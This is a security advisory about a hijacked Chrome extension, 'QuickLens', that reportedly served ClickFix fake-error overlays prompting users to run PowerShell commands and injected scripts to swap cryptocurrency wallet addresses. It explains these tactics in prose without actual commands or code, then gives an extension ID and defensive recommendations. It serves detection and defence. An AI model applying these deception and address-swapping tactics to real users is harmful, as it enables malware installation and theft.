QuickLens Chrome Extension Hijacked to Deploy ClickFix Malware

Executive Summary

A widely used Chrome extension, “QuickLens - Search Screen with Google Lens,” has been identified as a vehicle for malicious activity and subsequently removed from the Chrome Web Store. According to BleepingComputer, the extension was compromised to execute Phishing attacks and steal cryptocurrency from its user base, which exceeded 30,000 installations. The campaign leveraged a TTP known as “ClickFix,” where users are tricked into executing malicious PowerShell commands under the guise of fixing browser errors.

Technical Analysis

The QuickLens incident represents a growing trend of Supply Chain Attack methods involving browser extensions. Threat actors frequently acquire legitimate extensions with established user bases or compromise developer accounts to push malicious updates. In this instance, the extension (ID: pbdpajmclcmfodbaidmhpbmglfndabnd) was updated to include scripts that facilitated both data theft and malware delivery.

The ClickFix Social Engineering Tactic

The primary delivery mechanism observed in this campaign is the ClickFix technique. When a user visits a compromised or attacker-controlled site, the extension injects scripts that generate a fake error overlay. This overlay mimics a system dialog or a browser error, claiming that a component is missing. To “resolve” the issue, the user is instructed to copy a string of code and run it via the Windows PowerShell terminal.

This MITRE ATT&CK technique—Command and Scripting Interpreter (T1059)—effectively bypasses traditional browser security controls by persuading the user to execute the code locally. The PowerShell command typically retrieves a second-stage payload from a C2 server, leading to the installation of info-stealers or Ransomware.

Cryptocurrency Theft and Script Injection

Beyond the ClickFix redirection, the malicious version of QuickLens monitored web traffic for interactions with cryptocurrency wallets and exchanges. The extension could inject JavaScript into active tabs to monitor for specific wallet addresses. When a user attempted a transaction, the extension would dynamically replace the intended recipient’s address with one controlled by the attackers. This “clipper” functionality is difficult for non-technical users to detect, as the change occurs within the browser Document Object Model (DOM) just before the transaction is broadcast.

Defensive Recommendations

Defenders and SOC teams should treat browser extensions as potential entry points for data exfiltration and initial access.

Detection and IoC Management

Organizations should audit their environments for the specific extension ID pbdpajmclcmfodbaidmhpbmglfndabnd. While Google has removed the extension from the official store, it may remain active on systems where it was previously installed until manually removed or blocked by enterprise policy.

Actionable Mitigations

• Extension Allowlisting: Use Group Policy Objects (GPO) or MDM solutions to enforce an extension allowlist, preventing users from installing unverified third-party tools.
• PowerShell Execution Policies: Restrict the ability of standard users to execute PowerShell scripts. While ClickFix relies on manual entry, EDR solutions should be configured to alert on PowerShell processes initiated by browser parent processes.
• User Education: Train staff to recognize that legitimate software updates will never ask a user to manually copy and paste commands into a terminal.
• Monitoring DOM Changes: For high-value crypto-asset management, utilize hardware wallets and verify addresses on the device screen, which bypasses manipulation occurring within the browser environment.